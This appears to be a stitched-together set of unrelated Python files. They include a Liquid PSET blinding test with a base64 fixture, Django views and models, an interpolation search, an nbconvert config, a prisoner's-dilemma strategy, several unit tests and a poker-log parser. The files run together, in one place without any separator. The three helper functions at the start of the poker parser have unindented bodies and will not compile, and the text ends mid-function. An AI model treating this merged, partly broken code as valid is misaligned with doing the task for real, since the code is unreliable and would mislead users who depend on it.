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"
class TaprootTest(TestCase):
    """Exercise PSET unblind -> blind -> reblind round-trips, including
    running many round-trips concurrently from multiple threads."""

    # run blind-unblind in a thread or multiple threads
    def unblind_thread(self, pset, i, unblinded=None, blinded=None, reblinded=None):
        """Unblind, re-blind and reblind-with-message a PSET in place.

        pset       -- the PSET instance to process (mutated in place)
        i          -- index of the output to reblind with an extra message
        unblinded / blinded / reblinded -- optional expected serializations;
            when provided, str(pset) is asserted against them after the
            corresponding stage (None skips that check).
        """
        # check we can unblind
        pset.unblind(mbkey)
        for inp in pset.inputs:
            self.assertIsNotNone(inp.value)
            self.assertIsNotNone(inp.asset)
        if unblinded:
            self.assertEqual(str(pset), unblinded)
        # check we can blind
        # deterministic blinding seed derived from the master blinding key
        seed = tagged_hash("liquid/blinding_seed", mbkey.secret)
        pset.blind(seed)
        for out in pset.outputs:
            # outputs without a blinding pubkey stay unblinded — skip them
            if out.blinding_pubkey is None:
                continue
            self.assertIsNotNone(out.value_commitment)
            self.assertIsNotNone(out.asset_commitment)
            self.assertIsNotNone(out.range_proof)
            self.assertIsNotNone(out.surjection_proof)
        if blinded:
            self.assertEqual(str(pset), blinded)
        # check we can add extra message into the rangeproof
        # nonce for output 0 is derived from the per-tx seed
        txseed = pset.txseed(seed)
        nonce = tagged_hash("liquid/range_proof", txseed + (0).to_bytes(4, "little"))
        out = pset.outputs[i]
        msg = b"I can put any message here"
        out.reblind(nonce, extra_message=msg)
        if reblinded:
            self.assertEqual(str(pset), reblinded)
        # check we can unblind this output and extract the message
        vout = out.blinded_vout
        bkey = slip77.blinding_key(mbkey, vout.script_pubkey)
        res = vout.unblind(bkey.secret, message_length=200)
        value, asset, vbf, abf, extramsg, min_value, max_value = res
        # the rangeproof message is zero-padded up to message_length
        self.assertEqual(extramsg.rstrip(b"\x00"), msg)

    def test_threading(self):
        """Run one checked round-trip plus ten unchecked ones in parallel
        threads and verify the checked PSET still serializes as expected."""
        # reverse order for pset inputs and outputs
        # (gives a second, distinct-but-valid PSET for the background threads)
        pset = PSET.from_string(B64PSET)
        pset.inputs = pset.inputs[::-1]
        pset.outputs = pset.outputs[::-1]
        pset2 = PSET.from_string(str(pset))
        pset1 = PSET.from_string(B64PSET)
        self.assertTrue(str(pset1) != str(pset2))
        # five background threads working on independent copies of pset2
        tarr = [
            threading.Thread(target=self.unblind_thread, args=(PSET.from_string(str(pset2)),-1))
            for i in range(5)
        ]
        # the one thread whose intermediate serializations are asserted
        tarr.append(threading.Thread(target=self.unblind_thread, args=(pset1,0,UNBLINDED,BLINDED,REBLINDED)))
        # five more background threads
        tarr += [
            threading.Thread(target=self.unblind_thread, args=(PSET.from_string(str(pset2)),-1))
            for i in range(5)
        ]
        for t in tarr:
            t.start()
        for t in tarr:
            t.join()
        # concurrent processing must not have corrupted the checked PSET
        self.assertEqual(str(pset1), REBLINDED)
|
from django.views.generic import ListView, DetailView, CreateView
from django.contrib.auth.mixins import LoginRequiredMixin
from django.db.models.aggregates import Sum, Max
from .models import Brewery
from beerhunter.beers.models import Beer
class BreweryListView(ListView):
    """List all breweries, each annotated with an aggregate ``rating``
    (the sum of vote values across all of the brewery's beers)."""

    model = Brewery
    # 'brewered' is presumably the Beer -> Brewery related_name; summing
    # every vote value on every beer yields the brewery's total rating.
    # TODO(review): confirm the related_name against the Beer model.
    queryset = Brewery.objects.annotate(rating=Sum('brewered__vote__value'))
    context_object_name = "brewery_list"
class BreweryDetailView(DetailView):
    """Show a single brewery together with its beers and their summed score."""

    model = Brewery

    def get_context_data(self, **kwargs):
        """Extend the context with the brewery's beers (``connected_beers``)
        and the sum of their scores (``rating``); a beer with no score
        counts as zero."""
        ctx = super().get_context_data(**kwargs)
        qs_beers = Beer.objects.all_with_related_instances_and_score()
        brewery_beers = qs_beers.filter(brewery=ctx['brewery'])
        brewery_rating = 0
        for item in brewery_beers:
            # score is falsy (None/0) when a beer has no votes yet; normalize
            # it on the instance so templates can render it directly.
            if not item.score:
                item.score = 0
            brewery_rating += item.score
        ctx['connected_beers'] = brewery_beers
        ctx['rating'] = brewery_rating
        return ctx
class BreweryCreateView(LoginRequiredMixin, CreateView):
    """Authenticated-only form view for creating a new Brewery."""
    model = Brewery
    template_name = "breweries/brewery_form.html"
    # Only these fields are user-editable on the create form.
    fields = [
        'title',
        'country_of_origin'
    ]
|
"""
Python implementation of the Interpolation Search algorithm.
Given a sorted array in increasing order, interpolation search calculates
the starting point of its search according to the search key.
FORMULA: start_pos = low + [ (x - arr[low])*(high - low) / (arr[high] - arr[low]) ]
Doc: https://en.wikipedia.org/wiki/Interpolation_search
Time Complexity: O(log2(log2 n)) for average cases, O(n) for the worst case.
The algorithm performs best with uniformly distributed arrays.
"""
from typing import List
def interpolation_search(array: List[int], search_key: int) -> int:
    """
    :param array: The array to be searched (sorted in increasing order).
    :param search_key: The key to be searched in the array.
    :returns: Index of search_key in array if found, else -1.
    Example
    >>> interpolation_search([1, 10, 12, 15, 20, 41, 55], 20)
    4
    >>> interpolation_search([5, 10, 12, 14, 17, 20, 21], 55)
    -1
    """
    # highest and lowest index in array
    high = len(array) - 1
    low = 0
    # Probe only while the key can lie inside the current *value* range.
    # (The previous guard compared against the index `low` instead of
    # array[low], which missed negative keys entirely and could compute a
    # negative probe position, causing an IndexError.)
    while low <= high and array[low] <= search_key <= array[high]:
        if array[low] == array[high]:
            # All remaining values are equal; also avoids the division by
            # zero the interpolation formula would hit below.
            return low if array[low] == search_key else -1
        # calculate the search position
        pos = low + int(((search_key - array[low]) *
                         (high - low) / (array[high] - array[low])))
        # if array[pos] equals the search_key then return pos as the index
        if search_key == array[pos]:
            return pos
        # if the search_key is greater than array[pos] restart the search with the
        # subarray greater than array[pos]
        elif search_key > array[pos]:
            low = pos + 1
        # in this case start the search with the subarray smaller than current array[pos]
        elif search_key < array[pos]:
            high = pos - 1
    return -1
|
# Jupyter nbconvert configuration: export notebooks to LaTeX using the
# "highlighter" nbextension's template and its pre/post processors.
import os
import jupyter_contrib_nbextensions.nbconvert_support
# Install directory of jupyter_contrib_nbextensions (importing the
# nbconvert_support submodule above also binds the parent package name).
jcnbe_dir = os.path.dirname(jupyter_contrib_nbextensions.__file__)
pp_mod_name = 'jupyter_contrib_nbextensions.nbconvert_support.pp_highlighter'
c = get_config()  # noqa
c.NbConvertApp.export_format = "latex"
# Search the working directory, the contrib templates directory, and the
# highlighter nbextension directory for templates.
c.Exporter.extra_template_paths = [
    '.',
    jupyter_contrib_nbextensions.nbconvert_support.templates_directory(),
    os.path.join(jcnbe_dir, 'nbextensions', 'highlighter')
]
c.Exporter.preprocessors = [pp_mod_name + '.HighlighterPreprocessor']
c.NbConvertApp.postprocessor_class = pp_mod_name + '.HighlighterPostProcessor'
# latex
c.Exporter.template_file = 'highlighter.tplx'
# html
# c.Exporter.template_file = 'highlighter.tpl'
|
# Standard Library
import os
# Django Library
from djongo import models
from django.utils.translation import ugettext_lazy as _
# Localfolder Library
from ..rename_image import RenameImage
from .usercustom import PyUser
def image_path(instance, filename):
    """Build the upload path 'publication/<pk>.<ext>' for a publication image."""
    extension = filename.rsplit('.', 1)[1]
    return os.path.join('publication', '.'.join([str(instance.pk), extension]))
class PyPublication(models.Model):
    '''Publication Model
    A user-authored post with a like counter and creation/update timestamps.
    '''
    id = models.AutoField(primary_key=True)
    content = models.CharField(_("Content"), max_length=500)
    likes = models.IntegerField(_("Likes"), default = 0)
    created_at = models.DateTimeField(_("Created_at"), auto_now_add = True)
    updated_at = models.DateTimeField(_("Update_at"), auto_now = True)
    # Deleting the author cascades to their publications.
    user = models.ForeignKey(PyUser, on_delete=models.CASCADE, null=False, blank=False)
    class Meta:
        verbose_name = _('Publication')
        verbose_name_plural = _('Publications')
    # comments = models.ArrayField(model_container=PyComment)
class PyComment(models.Model):
    '''Comments Model
    A user comment attached to a single PyPublication.
    '''
    id = models.AutoField(primary_key=True)
    likes = models.IntegerField(_("Likes"), default = 0)
    content = models.CharField(_("Content"), max_length=300)
    created_at = models.DateTimeField(_("Created_at"), auto_now_add = True)
    # Deleting the author or the publication cascades to the comment.
    user = models.ForeignKey(PyUser, on_delete=models.CASCADE, null=False, blank=False)
    publication = models.ForeignKey(PyPublication, on_delete=models.CASCADE, null=False, blank=False)
    class Meta:
        verbose_name = _('Comment')
        verbose_name_plural = _('Comments')
|
from decimal import Decimal
import numpy
def strategy(history, memory):
    """
    Nice Patient Comparative Tit for Tat (NPCTT):
    1. Nice: never initiate defection, else face the wrath of the Grudge.
    2. Patient: answer defection with defection, unless it plausibly was a
       response to our own defection; give the opponent a chance to cooperate
       again, since even a few more backstabs leave both of us ahead, and
       Grudge/Tit-for-Tat punish habitual defectors anyway.
    3. Comparative: before forgiving, compare defection counts; forgive only
       when D(ours)/D(theirs) exceeds 50%.
    4. Tit for Tat: see Patient.
    Handles opponents that defect late without over-reacting to first moves.

    history is a 2 x n array (row 0 = our moves, row 1 = opponent's;
    1 = cooperate, 0 = defect).  Returns (choice, memory).
    """
    rounds_played = history.shape[1]
    opp_last = history[1, -1] if rounds_played >= 1 else 1
    my_second_last = history[0, -2] if rounds_played >= 2 else 1
    # Exclusive forgiveness threshold on our/their defection ratio.
    FORGIVENESS_THRESHOLD = Decimal(1) / Decimal(2)
    if rounds_played == 0:
        defect_ratio = 1
    else:
        my_defects = int(numpy.count_nonzero(history[0, 0:rounds_played] == 0))
        opp_defects = int(numpy.count_nonzero(history[1, 0:rounds_played] == 0))
        if opp_defects > 0:
            defect_ratio = Decimal(my_defects) / Decimal(opp_defects)
        else:
            defect_ratio = 1
    forgiving = defect_ratio > FORGIVENESS_THRESHOLD
    if opp_last == 1 or (forgiving and my_second_last == 0):
        return 1, None
    return 0, None
import unittest
from .mock import MockReader, MockSummarizer
##__________________________________________________________________||
class TestMockReader(unittest.TestCase):
    """Smoke tests for MockReader wired to a MockSummarizer."""

    def setUp(self):
        summarizer = MockSummarizer([])
        self.summarizer = summarizer
        self.obj = MockReader(summarizer)

    def tearDown(self):
        pass

    def test_repr(self):
        # repr() must not raise.
        repr(self.obj)

    def test_results(self):
        returned = self.obj.results()
        self.assertIs(self.summarizer, returned)
##__________________________________________________________________||
|
import unittest
from onlinejudge.service.codechef import CodeChefProblem, CodeChefService
from onlinejudge.type import SampleParseError, TestCase
class CodeChefSerivceTest(unittest.TestCase):
    # NOTE(review): "Serivce" is a typo for "Service"; left unchanged because
    # renaming the TestCase class is beyond a docs-only pass.
    def test_from_url(self):
        """from_url accepts CodeChef URLs and rejects unrelated hosts."""
        self.assertIsInstance(CodeChefService.from_url('https://www.codechef.com/'), CodeChefService)
        self.assertIsNone(CodeChefService.from_url('https://www.facebook.com/'))
class CodeChefProblemTest(unittest.TestCase):
    """URL-parsing and sample-download tests for CodeChef problems."""

    def test_from_url(self):
        problem = CodeChefProblem.from_url('https://www.codechef.com/COOK113A/problems/DAND')
        self.assertEqual(problem.contest_id, 'COOK113A')
        self.assertEqual(problem.problem_id, 'DAND')

    @unittest.skip("the parser is broken now. see https://github.com/online-judge-tools/api-client/issues/49")
    def test_download_samples(self):
        dand = CodeChefProblem.from_url('https://www.codechef.com/COOK113A/problems/DAND')
        self.assertEqual(dand.download_sample_cases(), [
            TestCase(name='sample', input_name='Example Input', input_data=b'6\n1 9 3\n4 7 1\n10 75 12\n3 8 3\n5 10 2\n192 913893 3812\n', output_name='Example Output', output_data=b'4\n7\n64\n4\n8\n909312\n'),
        ])
        cntset = CodeChefProblem.from_url('https://www.codechef.com/PLIN2020/problems/CNTSET')
        self.assertEqual(cntset.download_sample_cases(), [
            TestCase(name='sample', input_name='Sample Input', input_data=b'4 2\n', output_name='Sample Output', output_data=b'12\n'),
        ])

    @unittest.skip("the parser is broken now. see https://github.com/online-judge-tools/api-client/issues/49")
    def test_download_samples_todo(self):
        problem = CodeChefProblem.from_url('https://www.codechef.com/CNES2017/problems/ACESQN')
        self.assertRaises(SampleParseError, lambda: problem.download_sample_cases())
|
from __future__ import unicode_literals
from datetime import timedelta
from django.db import models
from django.conf import settings
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
class HitCountManager(models.Manager):
    """Manager that resolves the HitCount row for an arbitrary model instance."""

    def get_for_object(self, obj):
        """Return (creating if necessary) the HitCount tracking ``obj``."""
        content_type = ContentType.objects.get_for_model(obj)
        hit_count, _created = self.get_or_create(
            content_type=content_type, object_pk=obj.pk)
        return hit_count
class HitManager(models.Manager):
    """Manager exposing only hits recent enough to count as active."""

    def filter_active(self, *args, **kwargs):
        """Filter hits created inside the HITCOUNT_KEEP_HIT_ACTIVE window (default 7 days)."""
        grace = getattr(settings, 'HITCOUNT_KEEP_HIT_ACTIVE', {'days': 7})
        cutoff = timezone.now() - timedelta(**grace)
        recent = self.filter(created__gte=cutoff)
        return recent.filter(*args, **kwargs)
|
"""
Created on Sat Aug 15 14:27:18 2021
@author: Peter
"""
from dataclasses import dataclass
from typing import Optional, Union, List
def _player_name(text: str) -> Optional[str]:
if ' @ ' in text:
return text.split('"')[1].split('@')[0].strip()
else:
return None
def _player_index(text: str) -> Optional[str]:
if ' @ ' in text:
return text.split('@')[1].split('"')[0].strip()
else:
return None
def _stack(text: str) -> Optional[int]:
if 'stack of ' in text:
return int(text.split('stack of ')[1].split('.')[0])
else:
return None
@dataclass
class LineAttributes:
    """
    Applies attributes to a respective Class object.
    :param text: A line of text from the data.
    :type text: str
    :example: *None*
    :note: This class is intended to be used internally.
    """
    # NOTE(review): @dataclass declares no class-level fields and __init__ is
    # hand-written, so the decorator contributes only a generated
    # __repr__/__eq__ over an *empty* field set (all instances compare
    # equal) — confirm this is intended.
    def __init__(self, text: Union[str, None]):
        # Parsed straight from the raw line (when one is given).
        self._text = None
        self._player_name = None
        self._player_index = None
        self._stack = 0
        if text is not None:
            self.text = text
            self._player_name = _player_name(self.text)
            self._player_index = _player_index(self.text)
            self._stack = _stack(self.text)
        # Hand-level bookkeeping; parser() fills these in after construction.
        self._position = None
        self._winning_hand = None
        self._cards = None
        self._current_round = None
        self._pot_size = 0
        self._remaining_players = None
        self._action_from_player = 'None'
        self._action_amount = 0
        self._all_in = False
        self._game_id = None
        self._start_chips = 0
        self._current_chips = 0
        self._winner = None
        self._win_stack = None
        self._time = None
        self._previous_time = None
        self._start_time = None
        self._end_time = None
    # The accessors below are simple pass-throughs; they keep the public
    # attribute names stable while storage uses the underscored slots.
    @property
    def text(self) -> Union[str, None]:
        """Text input"""
        return self._text
    @text.setter
    def text(self, val):
        self._text = val
    @property
    def player_name(self) -> Union[str, None]:
        """Player Name"""
        return self._player_name
    @player_name.setter
    def player_name(self, val):
        self._player_name = val
    @property
    def player_index(self) -> Union[str, None]:
        """Player Id"""
        return self._player_index
    @player_index.setter
    def player_index(self, val):
        self._player_index = val
    @property
    def stack(self) -> Union[int, None]:
        """Amount offered to the table"""
        return self._stack
    @stack.setter
    def stack(self, val):
        self._stack = val
    @property
    def position(self) -> Union[str, None]:
        """Position of move in relation to table cards being drawn"""
        return self._position
    @position.setter
    def position(self, val):
        self._position = val
    @property
    def winning_hand(self) -> Union[str, None]:
        """Winning hand"""
        return self._winning_hand
    @winning_hand.setter
    def winning_hand(self, val):
        self._winning_hand = val
    @property
    def cards(self) -> Union[str, list, None]:
        """Card or cards"""
        return self._cards
    @cards.setter
    def cards(self, val):
        self._cards = val
    @property
    def current_round(self) -> Union[int, None]:
        """Round number within the game"""
        return self._current_round
    @current_round.setter
    def current_round(self, val):
        self._current_round = val
    @property
    def pot_size(self) -> Union[int, None]:
        """Size of pot when move happens"""
        return self._pot_size
    @pot_size.setter
    def pot_size(self, val):
        self._pot_size = val
    @property
    def remaining_players(self) -> Union[List[str], None]:
        """Players left in hand"""
        return self._remaining_players
    @remaining_players.setter
    def remaining_players(self, val):
        self._remaining_players = val
    @property
    def action_from_player(self) -> Union[str, None]:
        """Who bet previously"""
        return self._action_from_player
    @action_from_player.setter
    def action_from_player(self, val):
        self._action_from_player = val
    @property
    def action_amount(self) -> Union[int, None]:
        """Previous bet amount"""
        return self._action_amount
    @action_amount.setter
    def action_amount(self, val):
        self._action_amount = val
    @property
    def all_in(self) -> Union[bool, None]:
        """Notes if player when all-in"""
        return self._all_in
    @all_in.setter
    def all_in(self, val):
        self._all_in = val
    @property
    def game_id(self) -> Union[str, None]:
        """File name"""
        return self._game_id
    @game_id.setter
    def game_id(self, val):
        self._game_id = val
    # Note the public name differs from the backing slot (_start_chips).
    @property
    def starting_chips(self) -> Union[int, None]:
        """Player's chip count at start of hand"""
        return self._start_chips
    @starting_chips.setter
    def starting_chips(self, val):
        self._start_chips = val
    @property
    def current_chips(self) -> Union[int, None]:
        """Player's chip count at time of move"""
        return self._current_chips
    @current_chips.setter
    def current_chips(self, val):
        self._current_chips = val
    @property
    def winner(self) -> Union[str, None]:
        """Player Name who wins the hand"""
        return self._winner
    @winner.setter
    def winner(self, val):
        self._winner = val
    @property
    def win_stack(self) -> Union[int, None]:
        """Amount won at end of hand"""
        return self._win_stack
    @win_stack.setter
    def win_stack(self, val):
        self._win_stack = val
    @property
    def time(self):
        """Timestamp of action"""
        return self._time
    @time.setter
    def time(self, val):
        self._time = val
    @property
    def previous_time(self):
        """Timestamp of previous action"""
        return self._previous_time
    @previous_time.setter
    def previous_time(self, val):
        self._previous_time = val
    @property
    def start_time(self):
        """Timestamp of the start of the hand"""
        return self._start_time
    @start_time.setter
    def start_time(self, val):
        self._start_time = val
    @property
    def end_time(self):
        """Timestamp of the end of the hand"""
        return self._end_time
    @end_time.setter
    def end_time(self, val):
        self._end_time = val
@dataclass
class Requests(LineAttributes):
    """Class for players Requesting a seat."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Requests"
@dataclass
class Approved(LineAttributes):
    """Class for players when Approved a seat."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Approved"
@dataclass
class Joined(LineAttributes):
    """Class for players Joined the table."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Joined"
@dataclass
class MyCards(LineAttributes):
    """Class for users cards."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Player Cards"
@dataclass
class SmallBlind(LineAttributes):
    """Class for the Small Blind player."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Small Blind"
@dataclass
class BigBlind(LineAttributes):
    """Class for the Big Blind player."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Big Blind"
@dataclass
class Folds(LineAttributes):
    """Class for players that Fold."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Folds"
@dataclass
class Calls(LineAttributes):
    """Class for players that Call."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Calls"
@dataclass
class Raises(LineAttributes):
    """Class for players that Raise."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Raises"
@dataclass
class Checks(LineAttributes):
    """Class for players that Check."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Checks"
@dataclass
class Wins(LineAttributes):
    """Class for players that Win."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Wins"
@dataclass
class Shows(LineAttributes):
    """Class for players that Show their cards."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Shows"
@dataclass
class Quits(LineAttributes):
    """Class for players that Quit the table."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Quits"
@dataclass
class Flop(LineAttributes):
    """Class for Flop cards."""
    def __init__(self, text: Union[str, None]):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Flop Cards"
@dataclass
class Turn(LineAttributes):
    """Class for Turn card."""
    def __init__(self, text: Union[str, None]):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Turn Card"
@dataclass
class River(LineAttributes):
    """Class for River card."""
    def __init__(self, text: Union[str, None]):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "River Card"
@dataclass
class Undealt(LineAttributes):
    """Class for Undealt cards."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Undealt"
@dataclass
class StandsUp(LineAttributes):
    """Class for players that Stand Up."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Stand Up"
@dataclass
class SitsIn(LineAttributes):
    """Class for players that Sit In."""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Sits In"
@dataclass
class PlayerStacks(LineAttributes):
    """Class for getting players and their stacks at the beginning of a hand"""
    def __init__(self, text: str):
        # All attribute parsing is delegated to LineAttributes.
        super().__init__(text)
    def __repr__(self):
        return "Player Stacks"
def _request(line: str) -> Optional[Requests]:
    """Return a Requests event when the line logs a seat request, else None."""
    return Requests(line) if 'requested a seat' in line else None
def _approved(line: str) -> Optional[Approved]:
    """Return an Approved event when the admin approved a seat, else None."""
    return Approved(line) if 'The admin approved' in line else None
def _joined(line: str) -> Optional[Joined]:
    """Return a Joined event when a player joined the game, else None."""
    return Joined(line) if 'joined the game' in line else None
def _my_cards(line: str) -> Optional[MyCards]:
    """Return a MyCards event for the user's own hole cards, else None."""
    return MyCards(line) if 'Your hand' in line else None
def _small_blind(line: str) -> Optional[SmallBlind]:
    """Return a SmallBlind event when the small blind is posted, else None."""
    return SmallBlind(line) if 'posts a small blind' in line else None
def _big_blind(line: str) -> Optional[BigBlind]:
    """Return a BigBlind event when the big blind is posted, else None."""
    return BigBlind(line) if 'posts a big blind' in line else None
def _folds(line: str) -> Optional[Folds]:
    """Return a Folds event when a player folds, else None."""
    return Folds(line) if ' folds' in line else None
def _calls(line: str) -> Optional[Calls]:
    """Return a Calls event when a player calls, else None."""
    return Calls(line) if ' calls ' in line else None
def _raises(line: str) -> Optional[Raises]:
    """Return a Raises event for a bet or a raise, else None."""
    return Raises(line) if (' bets ' in line or ' raises ' in line) else None
def _checks(line: str) -> Optional[Checks]:
    """Return a Checks event when a player checks, else None."""
